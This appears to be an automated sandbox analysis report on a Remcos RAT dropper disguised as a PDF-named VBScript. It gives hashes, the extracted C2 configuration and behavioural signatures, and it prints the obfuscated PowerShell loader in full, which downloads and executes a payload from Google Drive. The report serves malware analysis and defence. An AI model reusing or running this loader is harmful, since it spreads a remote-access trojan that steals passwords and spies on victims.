Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-11-2024 08:56
Static task
static1
Behavioral task
behavioral1
Sample
11315781264·pdf.vbs
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
11315781264·pdf.vbs
Resource
win10v2004-20241007-en
General
-
Target
11315781264·pdf.vbs
-
Size
86KB
-
MD5
8b88faca30c1d912d945515b0edce924
-
SHA1
62d5bee19f043112784832da29a423e1a35cdbae
-
SHA256
2a3615e8c977f2a9411c9fef294c7dd53986ce084579340b55977544fc94f143
-
SHA512
be3f1dcdb304cf2e72c9f305cc24c3cb99c6a7579b5d5c69c77f14cdfb12dad82cc3b1ba875d0e94c86cafc740a10a4bfc7eb809c58b9c01ece4dc1fc1e549f9
-
SSDEEP
1536:R70tt9i0kFFGd9p6puoNyVnJrsI/FBqqOkbSApBknXZ8Y4apgi1VdXaAj2LvbAP:RQL9ihHU9Yu4kn1OEDp6nXZ8YjpTVdus
Malware Config
Extracted
remcos
RemoteHost
13hindi4pistatukoy4tra.duckdns.org:47392
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-7IIE67
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/548-90-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/1020-97-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/2044-92-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/2044-92-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/548-90-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 13 IoCs
flow pid Process 6 2620 WScript.exe 10 2400 powershell.exe 17 2400 powershell.exe 40 3956 msiexec.exe 42 3956 msiexec.exe 44 3956 msiexec.exe 46 3956 msiexec.exe 48 3956 msiexec.exe 51 3956 msiexec.exe 54 3956 msiexec.exe 55 3956 msiexec.exe 56 3956 msiexec.exe 58 3956 msiexec.exe -
Uses browser remote debugging 2 TTPs 7 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4300 Chrome.exe 2312 Chrome.exe 2428 Chrome.exe 4128 Chrome.exe 2028 msedge.exe 1720 msedge.exe 3692 msedge.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 9 drive.google.com 10 drive.google.com 40 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3956 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1444 powershell.exe 3956 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3956 set thread context of 548 3956 msiexec.exe 106 PID 3956 set thread context of 2044 3956 msiexec.exe 107 PID 3956 set thread context of 1020 3956 msiexec.exe 108 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2400 powershell.exe 1444 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Chrome.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1860 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2400 powershell.exe 2400 powershell.exe 1444 powershell.exe 1444 powershell.exe 1444 powershell.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 548 msiexec.exe 548 msiexec.exe 1020 msiexec.exe 1020 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 548 msiexec.exe 548 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 4300 Chrome.exe 4300 Chrome.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1444 powershell.exe 3956 msiexec.exe 3956 msiexec.exe 3956 msiexec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 2028 msedge.exe 2028 msedge.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2400 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 1020 msiexec.exe Token: SeShutdownPrivilege 4300 Chrome.exe Token: SeCreatePagefilePrivilege 4300 Chrome.exe Token: SeShutdownPrivilege 4300 Chrome.exe Token: SeCreatePagefilePrivilege 4300 Chrome.exe Token: SeShutdownPrivilege 4300 Chrome.exe Token: SeCreatePagefilePrivilege 4300 Chrome.exe Token: SeShutdownPrivilege 4300 Chrome.exe Token: SeCreatePagefilePrivilege 4300 Chrome.exe Token: SeShutdownPrivilege 4300 Chrome.exe Token: SeCreatePagefilePrivilege 4300 Chrome.exe Token: SeShutdownPrivilege 4300 Chrome.exe Token: SeCreatePagefilePrivilege 4300 Chrome.exe Token: SeShutdownPrivilege 4300 Chrome.exe Token: SeCreatePagefilePrivilege 4300 Chrome.exe Token: SeShutdownPrivilege 4300 Chrome.exe Token: SeCreatePagefilePrivilege 4300 Chrome.exe Token: SeShutdownPrivilege 4300 Chrome.exe Token: SeCreatePagefilePrivilege 4300 Chrome.exe Token: SeShutdownPrivilege 4300 Chrome.exe Token: SeCreatePagefilePrivilege 4300 Chrome.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 4300 Chrome.exe 2028 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2620 wrote to memory of 2400 2620 WScript.exe 84 PID 2620 wrote to memory of 2400 2620 WScript.exe 84 PID 1444 wrote to memory of 3956 1444 powershell.exe 100 PID 1444 wrote to memory of 3956 1444 powershell.exe 100 PID 1444 wrote to memory of 3956 1444 powershell.exe 100 PID 1444 wrote to memory of 3956 1444 powershell.exe 100 PID 3956 wrote to memory of 3588 3956 msiexec.exe 101 PID 3956 wrote to memory of 3588 3956 msiexec.exe 101 PID 3956 wrote to memory of 3588 3956 msiexec.exe 101 PID 3588 wrote to memory of 1860 3588 cmd.exe 103 PID 3588 wrote to memory of 1860 3588 cmd.exe 103 PID 3588 wrote to memory of 1860 3588 cmd.exe 103 PID 3956 wrote to memory of 4300 3956 msiexec.exe 104 PID 3956 wrote to memory of 4300 3956 msiexec.exe 104 PID 4300 wrote to memory of 1604 4300 Chrome.exe 105 PID 4300 wrote to memory of 1604 4300 Chrome.exe 105 PID 3956 wrote to memory of 548 3956 msiexec.exe 106 PID 3956 wrote to memory of 548 3956 msiexec.exe 106 PID 3956 wrote to memory of 548 3956 msiexec.exe 106 PID 3956 wrote to memory of 548 3956 msiexec.exe 106 PID 3956 wrote to memory of 2044 3956 msiexec.exe 107 PID 3956 wrote to memory of 2044 3956 msiexec.exe 107 PID 3956 wrote to memory of 2044 3956 msiexec.exe 107 PID 3956 wrote to memory of 2044 3956 msiexec.exe 107 PID 3956 wrote to memory of 1020 3956 msiexec.exe 108 PID 3956 wrote to memory of 1020 3956 msiexec.exe 108 PID 3956 wrote to memory of 1020 3956 msiexec.exe 108 PID 3956 wrote to memory of 1020 3956 msiexec.exe 108 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 1448 4300 Chrome.exe 109 PID 4300 wrote to memory of 4824 4300 Chrome.exe 110 PID 4300 wrote to memory of 4824 4300 Chrome.exe 110 PID 4300 wrote to memory of 4580 4300 Chrome.exe 111 PID 4300 wrote to memory of 4580 4300 Chrome.exe 111 PID 4300 wrote to memory of 4580 4300 Chrome.exe 111 PID 4300 wrote to memory of 4580 4300 Chrome.exe 111
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"2⤵
- Blocklisted process makes network request
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ 